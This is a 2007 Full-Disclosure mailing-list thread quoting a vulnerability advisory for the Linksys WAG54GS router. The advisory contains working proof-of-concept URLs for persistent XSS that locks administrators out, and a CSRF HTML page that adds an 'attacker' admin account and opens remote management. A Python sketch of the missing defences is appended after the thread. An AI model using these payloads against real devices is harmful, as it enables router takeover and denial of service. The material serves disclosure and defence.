Message-ID: <4682DB65.4040903@gmail.com>
Date: Wed, 27 Jun 2007 22:49:25 +0100
From: pagvac <unknown.pentester@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Persistent XSS and CSRF on network appliance
 [subject corrected :) ]


Nice look up to http://unknown.pentester.googlepages.com/sitemap.xml

If you bothered that much you deserve the advisory I guess :-D.

btw, I didn't know google pages have sitemap.xml enabled by default.

So no hash cracking here, just to set things straight.

Joey Mengele wrote:
> After plugging this hash into John The Ripper, I was able to
> reproduce the text of the original advisory. It follows in
> entirety. For those wishing to verify the hash provided by the
> architect, I have also included the advisory in attachment form as
> a convenience for the skeptics who say MD5 can not be reversed.
>
> J
>
> ___ BEGIN LAME CRACKED ADVISORY ___
> Persistent XSS and CSRF on Wireless-G ADSL Gateway with
> SpeedBooster (WAG54GS)
>
> == Date found ==
>
> 24 June 2007
>
> == Firmware Version ==
>
> V1.00.06
>
> == Description ==
>
>
> There are several persistent XSS vulnerabilities on the
> '/setup.cgi' script.
>
> It is possible to inject JavaScript by assigning a payload like the
> following to any of the vulnerable parameters:
>
>> <script>[PAYLOAD]</script>
>
> The vulnerable (non-sanitized) parameters are the following:
>
> 'devname'
> 'snmp_getcomm'
> 'snmp_setcomm'
> 'c4_trap_ip_'
>
> Additionally, all HTTP requests are not tokenized using non-predictable
> values. Thus, all requests to the router's HTTP interface are vulnerable
> to Cross-site Request Forgeries (CSRF), perhaps by design.
>
> The following is an example of an HTTP request (notice the lack of
> non-predictable tokens):
>
>     POST /setup.cgi HTTP/1.1
>     Authorization: Basic YWRtaW46YWRtaW4=
>
>     mtenRestore=Restore+Factory+Defaults&todo=defaultsettings&this_file=Factorydefaults.htm&next_file=index.htm&message=
>
> Although the original request is a POST, we can convert it to a
> GET, so that all posted parameters can be submitted on a single URL.
>
> For example, the previous POST request can be converted to a URL
> such as the following:
>
>     http://admin:admin@....168.1.1/setup.cgi?mtenRestore=Restore+Factory+Defaults&todo=defaultsettings&this_file=Factorydefaults.htm&next_file=index.htm&message=
>
> By forging administrative requests ("Administration" button on the
> router's HTML menu), an attacker can compromise the router provided
> the victim user visits a malicious URL or HTML page.
>
> The attack can only be successful if any of the following
> conditions are met:
>
> - the administrator hasn't changed the default credentials
>   (admin/admin)
> - the administrator's browser has an active authentication session
>   with the router's interface when the attack happens
>   (highly unlikely)
>
>
> == Persistent XSS PoC ==
>
> The following URL creates a DoS condition by making the
> "Administration" page inaccessible since 'history.back()'
> will run every time the Administration page is visited. Thus the
> administrator won't be able to ever change the
> default credentials unless a hard reset is performed using the
> router's physical "restart" switch:
>
>     http://admin:admin@....168.1.1/setup.cgi?user_list=1&sysname=admin&sysPasswd=admin&sysConfirmPasswd=admin&remote_management=enable&http_wanport=8080&devname=&snmp_enable=disable&upnp_enable=enable&wlan_enable=enable&save=Save+Settings&h_user_list=1&h_pwset=yes&pwchanged=yes&h_remote_management=enable&c4_trap_ip_="><script>history.back()</script>&h_snmp_enable=enable&h_upnp_enable=enable&h_wlan_enable=enable&todo=save&this_file=Administration.htm&next_file=Administration.htm&message=
>     http://tinyurl.com/36sjzw
>
>
> == CSRF PoC ==
>
> The following HTML page does the following:
>
> - adds an *additional* administrative account, with a username
>   equal to 'attacker' and a password equal to '0wned' (without
>   removing the original admin account!)
> - enables remote HTTP management over port 1337
> - sets other settings that are irrelevant to this discussion
>
>     <html>
>     <body>
>         <script>
>         // send 2 requests to add an administrative account and enable remote management
>         // tries with default credentials and with credentials cached by browser (if any)
>
>         var img = new Image();
>         var img2 = new Image();
>
>         img.src = 'http://admin:admin@....168.1.1/setup.cgi?user_list=8&sysname=attacker&sysPasswd=0wned&sysConfirmPasswd=0wned&remote_management=enable&http_wanport=1337&devname=&snmp_enable=disable&upnp_enable=enable&wlan_enable=enable&save=Save+Settings&h_user_list=8&h_pwset=yes&pwchanged=yes&h_remote_management=enable&c4_trap_ip_=&h_snmp_enable=disable&h_upnp_enable=enable&h_wlan_enable=enable&todo=save&this_file=Administration.htm&next_file=Administration.htm&message=';
>         img2.src = 'http://192.168.1.1/setup.cgi?user_list=8&sysname=attacker&sysPasswd=0wned&sysConfirmPasswd=0wned&remote_management=enable&http_wanport=1337&devname=&snmp_enable=disable&upnp_enable=enable&wlan_enable=enable&save=Save+Settings&h_user_list=8&h_pwset=yes&pwchanged=yes&h_remote_management=enable&c4_trap_ip_=&h_snmp_enable=disable&h_upnp_enable=enable&h_wlan_enable=enable&todo=save&this_file=Administration.htm&next_file=Administration.htm&message=';
>         </script>
>     </body>
>     </html>
>
> The first URL forges the administrative request using the default
> credentials, so it won't work if default credentials have been changed.
>
> The second URL doesn't specify any credentials as an attempt to use
> the browser's cached credentials. If the admin user has clicked on
> "Save password" on the basic authentication prompt, most browsers will
> prompt the user to confirm submitting the cached credentials. The
> only situation in which browsers won't ask the user to confirm
> submitting the credentials would be if the malicious CSRF page was
> visited while the browser has an active authenticated session with
> the router's HTTP interface (very unlikely).
>
>
> == Additional notes ==
>
> - router reboots after saving settings (requests sent to
> 'setup.cgi')
>
> - all attacks were tested using Internet Explorer 7
>
> - No firmware updates were available at time of testing, only GPL
> code is available:
>
> http://www.linksys.com/servlet/Satellite?c=L_CASupport_C2&childpagename=US%2FLayout&cid=1166859889040&pagename=Linksys%2FCommon%2FVisitorWrapper&lid=8904040638B02&displaypage=download#versiondetail
>
>
> == References ==
>
> http://www.linksys.com/
>
>
> == Credits ==
>
> pagvac [ikwt.com] and Petko Petkov [gnucitizen.org]
> ___ END LAME CRACKED ADVISORY ___
>
> On Wed, 27 Jun 2007 16:29:43 -0400 pagvac
> <unknown.pentester@...il.com> wrote:
>> The file "research.txt" will be provided once the vendor fixes the
>> issues. At that point anyone can check that the hash matches the
>> one
>> included in this post.
>>
>> Thank you.
>>
>> Joey Mengele wrote:
>>> Please provide the original content of research.txt so I can verify
>>> that the hash is correct. I will also need the hash of your
>>> md5sum.exe. Thanks.
>>>
>>> J
>>>
>>> On Wed, 27 Jun 2007 16:02:16 -0400 pagvac
>>> <unknown.pentester@...il.com> wrote:
>>>> The HTTP interface of a network appliance has been researched and
>>>> found to be vulnerable to several persistent XSS and CSRF.
>>>>
>>>> Such research was done by pdp (architect) and myself. We informed
>>>> the vendor and will publish the details when a fix is available.
>>>>
>>>> The following is the MD5 hash for the advisory file.
>>>>
>>>> $ md5sum.exe research.txt
>>>> 3db1d71fc3a0eae119617b3b1124206f  *research.txt
>>>>
>>>> Regards,
>>>>
>>>> --
>>>> pagvac
>>>> [http://gnucitizen.org, http://ikwt.com/]
>>
>> --
>> pagvac
>> [http://gnucitizen.org, http://ikwt.com/]
>


--
pagvac
[http://gnucitizen.org, http://ikwt.com/]
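A defender-side illustration, added here and not part of the thread or of the Linksys firmware: a hypothetical hardened stand-in for a /setup.cgi-style handler, in Python, applying the controls whose absence the advisory describes (state changes over POST only, an unpredictable per-session anti-CSRF token checked on every request, and HTML-escaping of the four parameters it names before they are echoed back), run against constructed inputs modelled on the PoCs above. The function names, the csrf_token parameter and the return shape are assumptions.

```python
import hmac
import html
import secrets
from urllib.parse import parse_qs

# Parameters the advisory names as echoed unsanitized by /setup.cgi.
UNSANITIZED_PARAMS = ("devname", "snmp_getcomm", "snmp_setcomm", "c4_trap_ip_")


def issue_csrf_token() -> str:
    """Unpredictable per-session token the firmware would embed in every form."""
    return secrets.token_urlsafe(32)


def handle_setup(method: str, query: str, session_token: str) -> dict:
    """Hypothetical hardened stand-in for a /setup.cgi-style handler.

    Three checks the advisory shows the WAG54GS lacked:
    1. state changes are accepted over POST only (no "convert it to a GET");
    2. the request must carry a 'csrf_token' equal to the session token,
       compared in constant time (Basic auth alone proves nothing about
       who built the request);
    3. the parameters later rendered into Administration.htm are HTML-escaped.
    """
    if method.upper() != "POST":
        return {"status": 405, "reason": "state change requires POST"}
    params = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    supplied = params.get("csrf_token", "")
    if not hmac.compare_digest(supplied.encode(), session_token.encode()):
        return {"status": 403, "reason": "missing or invalid anti-CSRF token"}
    rendered = {p: html.escape(params.get(p, ""), quote=True) for p in UNSANITIZED_PARAMS}
    return {"status": 200, "rendered": rendered}


if __name__ == "__main__":
    token = issue_csrf_token()
    # Constructed inputs modelled on the advisory's PoCs (not the originals).
    forged = "user_list=8&sysname=attacker&sysPasswd=0wned&todo=save"
    print(handle_setup("GET", forged, token)["status"])   # 405: GET conversion refused
    print(handle_setup("POST", forged, token)["status"])  # 403: no token in forged request
    xss = 'csrf_token=%s&c4_trap_ip_="><script>history.back()</script>&todo=save' % token
    print(handle_setup("POST", xss, token)["rendered"]["c4_trap_ip_"])  # escaped, inert
```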

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
